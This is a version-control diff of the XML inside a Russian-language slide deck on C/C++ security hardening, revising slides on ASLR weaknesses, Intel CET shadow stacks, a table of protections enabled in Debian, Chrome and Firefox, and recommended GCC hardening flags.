+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В частности использование </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>fork </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>компрометирует </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>ASLR </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Zygote-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>процесс в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -5668,11 +5708,14 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>) =&gt; </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>относительный библиотек и </a:t>
+              <a:t>) </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Относительный библиотек и </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -5711,11 +5754,19 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Небольшое число рандомизируемых битов (16 или даже 8 в 32-битных Windows и ранних </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android)</a:t>
+              <a:t>Небольшое число рандомизируемых битов</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>16 или даже 8 в 32-битных Windows и ранних </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -5730,71 +5781,44 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>fork </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компрометирует </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>ASLR </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Zygote-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>процесс в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android)</a:t>
-            </a:r>
+              <a:t>Windows</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рандомизация каждого приложения делается однократно при его первой загрузке (для ускорения)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Одна и та же библиотека может грузиться по одному адресу в разных приложениях (для ускорения)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В Windows</a:t>
-            </a:r>
+              <a:t>Linux</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рандомизация каждого приложения делается однократно при его первой загрузке (для ускорения)</a:t>
-            </a:r>
+              <a:t>Рандомизация делается однократно при старте сервиса</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Одна и та же библиотека может грузиться по одному адресу в разных приложениях (для ускорения)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В Linux рандомизация делается однократно при старте сервиса</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Уязвима к brute force (особенно на 32-битных платформах)</a:t>
             </a:r>
           </a:p>
@@ -5803,6 +5827,11 @@
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Рекомендуется делать регулярный рестарт сервисов</a:t>
             </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> !</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -8358,7 +8387,15 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Intel CET Shadow Stack: </a:t>
+              <a:t>Intel CET Shadow Stack:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> не реализован (нельзя включить ни по</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
@@ -8383,18 +8420,18 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>или </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>ни по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>–</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
@@ -8405,15 +8442,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>требует аппаратной поддержки </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Intel CET)</a:t>
+              <a:t>)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -27973,14 +28002,14 @@
           <p:nvPr>
             <p:extLst>
               <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
-                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1770854364"/>
+                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3911734843"/>
               </p:ext>
             </p:extLst>
           </p:nvPr>
         </p:nvGraphicFramePr>
         <p:xfrm>
           <a:off x="838200" y="981311"/>
-          <a:ext cx="8453718" cy="5558160"/>
+          <a:ext cx="8453718" cy="5783040"/>
         </p:xfrm>
         <a:graphic>
           <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
@@ -29186,11 +29215,15 @@
                       </a:pPr>
                       <a:r>
                         <a:rPr lang="en-US" sz="1400" dirty="0"/>
-                        <a:t>?</a:t>
+                        <a:t>N</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
-                  <a:tcPr anchor="ctr"/>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
                 </a:tc>
                 <a:tc>
                   <a:txBody>
@@ -29236,11 +29269,15 @@
                       <a:pPr algn="ctr"/>
                       <a:r>
                         <a:rPr lang="en-US" sz="1400" dirty="0"/>
-                        <a:t>?</a:t>
+                        <a:t>N</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
-                  <a:tcPr anchor="ctr"/>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
                 </a:tc>
                 <a:tc>
                   <a:txBody>
@@ -29286,11 +29323,15 @@
                       <a:pPr algn="ctr"/>
                       <a:r>
                         <a:rPr lang="en-US" sz="1400" dirty="0"/>
-                        <a:t>?</a:t>
+                        <a:t>N</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
-                  <a:tcPr anchor="ctr"/>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
                 </a:tc>
                 <a:extLst>
                   <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
@@ -29411,13 +29452,13 @@
                       <a:pPr algn="ctr"/>
                       <a:r>
                         <a:rPr lang="en-US" sz="1400" dirty="0"/>
-                        <a:t>Y</a:t>
+                        <a:t>N*</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
                   <a:tcPr anchor="ctr">
                     <a:solidFill>
-                      <a:schemeClr val="accent6"/>
+                      <a:srgbClr val="FFFF00"/>
                     </a:solidFill>
                   </a:tcPr>
                 </a:tc>
@@ -29465,11 +29506,15 @@
                       <a:pPr algn="ctr"/>
                       <a:r>
                         <a:rPr lang="en-US" sz="1400" dirty="0"/>
-                        <a:t>?</a:t>
+                        <a:t>Y</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
-                  <a:tcPr anchor="ctr"/>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
                 </a:tc>
                 <a:extLst>
                   <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
@@ -29954,14 +29999,22 @@
                     <a:p>
                       <a:pPr algn="ctr"/>
                       <a:r>
-                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
-                        <a:t>N</a:t>
+                        <a:rPr lang="en-US" sz="1100" dirty="0"/>
+                        <a:t>Y (</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
+                        <a:t>libstdc</a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1100" dirty="0"/>
+                        <a:t>++)</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
                   <a:tcPr anchor="ctr">
                     <a:solidFill>
-                      <a:schemeClr val="accent2"/>
+                      <a:schemeClr val="accent6"/>
                     </a:solidFill>
                   </a:tcPr>
                 </a:tc>
@@ -30993,7 +31046,14 @@
                       <a:pPr algn="ctr"/>
                       <a:r>
                         <a:rPr lang="en-US" sz="1400" dirty="0"/>
-                        <a:t>CFI (Intel CET)</a:t>
+                        <a:t>Hardware CFI</a:t>
+                      </a:r>
+                    </a:p>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>(Intel CET, AArch64 BP)</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
@@ -31145,13 +31205,13 @@
                       <a:pPr algn="ctr"/>
                       <a:r>
                         <a:rPr lang="en-US" sz="1400" dirty="0"/>
-                        <a:t>Y</a:t>
+                        <a:t>N*</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
                   <a:tcPr anchor="ctr">
                     <a:solidFill>
-                      <a:schemeClr val="accent6"/>
+                      <a:srgbClr val="FFFF00"/>
                     </a:solidFill>
                   </a:tcPr>
                 </a:tc>
@@ -31262,8 +31322,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="9583270" y="1981200"/>
-            <a:ext cx="2357718" cy="2585323"/>
+            <a:off x="9659470" y="421341"/>
+            <a:ext cx="2357718" cy="6186309"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -31310,11 +31370,53 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>включено меньше защит чем в </a:t>
+              <a:t>включено намного меньше защит чем в </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>GCC</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Многие новые защиты по умолчанию не включены</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пакеты системы защищены лучше чем пользовательские программы</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>* - </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>будет включён в следующей версии </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -31398,7 +31500,7 @@
           <p:nvPr>
             <p:extLst>
               <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
-                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1931322201"/>
+                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3146313282"/>
               </p:ext>
             </p:extLst>
           </p:nvPr>
@@ -31460,7 +31562,7 @@
                       <a:pPr algn="ctr"/>
                       <a:r>
                         <a:rPr lang="en-US" sz="1400" dirty="0"/>
-                        <a:t>Chrome</a:t>
+                        <a:t>Chrome (d0273f3d)</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
@@ -31474,7 +31576,7 @@
                       <a:pPr algn="ctr"/>
                       <a:r>
                         <a:rPr lang="en-US" sz="1400" dirty="0"/>
-                        <a:t>Firefox</a:t>
+                        <a:t>Firefox (b0ca903b)</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
@@ -31678,7 +31780,7 @@
                   </a:txBody>
                   <a:tcPr anchor="ctr">
                     <a:solidFill>
-                      <a:schemeClr val="accent6"/>
+                      <a:srgbClr val="FFFF00"/>
                     </a:solidFill>
                   </a:tcPr>
                 </a:tc>
@@ -32380,7 +32482,15 @@
                       </a:pPr>
                       <a:r>
                         <a:rPr lang="en-US" sz="1400" dirty="0"/>
-                        <a:t>Y</a:t>
+                        <a:t>Y (LLVM </a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="ru-RU" sz="1400" dirty="0"/>
+                        <a:t>на </a:t>
+                      </a:r>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>X86, AArch64 CFI)</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
@@ -32665,8 +32775,12 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Сравнение с </a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Hardening </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -4282,15 +4282,15 @@
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не загруженные динамически с помощью </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Но не загруженные динамически с помощью </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
               <a:t>dlopen</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (см. </a:t>
+              <a:t> (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
@@ -7881,7 +7881,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в среднем (</a:t>
+              <a:t>по замерам авторов (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
@@ -8315,10 +8315,10 @@
               </a:rPr>
               <a:t>The Stack Clash</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>10 proof</a:t>
@@ -8339,7 +8339,10 @@
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>concept атак</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:r>
@@ -8355,7 +8358,7 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Перед выполнением функции пройти по фрейму</a:t>
+              <a:t>Перед выполнением функции пройти по новому фрейму</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -28965,19 +28968,33 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" sz="1600" dirty="0"/>
-              <a:t>дефолтные защиты могут быть отключены в конкретных пакетах (</a:t>
+              <a:t>дефолтные защиты могут быть отключены в конкретных пакетах (например</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1600" dirty="0"/>
-              <a:t>e.g. python3 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" sz="1600" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>python3 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="1600" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
               <a:t>в</a:t>
             </a:r>
             <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t> Debian 12</a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="en-US" sz="1600" dirty="0"/>
-              <a:t> Debian 12)</a:t>
+              <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
           </a:p>
@@ -31678,15 +31695,32 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>опция для наиболее важных </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardened-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>оптимизаций</a:t>
+              <a:t>опция для наиболее важных защит</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Хороший дефолтный флаг, но пока реализован только в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>LLVM #122687</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -31699,15 +31733,36 @@
               <a:rPr lang="en-US" dirty="0" err="1"/>
               <a:t>OpenSSF</a:t>
             </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Compiler Options Hardening Guide for C and C++</a:t>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Конкретный набор зависит от версии компилятора </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>есть </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>--help=hardened</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -31715,193 +31770,198 @@
             </a:r>
           </a:p>
           <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Сейчас</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>ftrivial</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-auto-var-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>init</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=zero -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fPIE</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>Wl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>z,now</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>Wl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>z,relro</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protector-strong -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
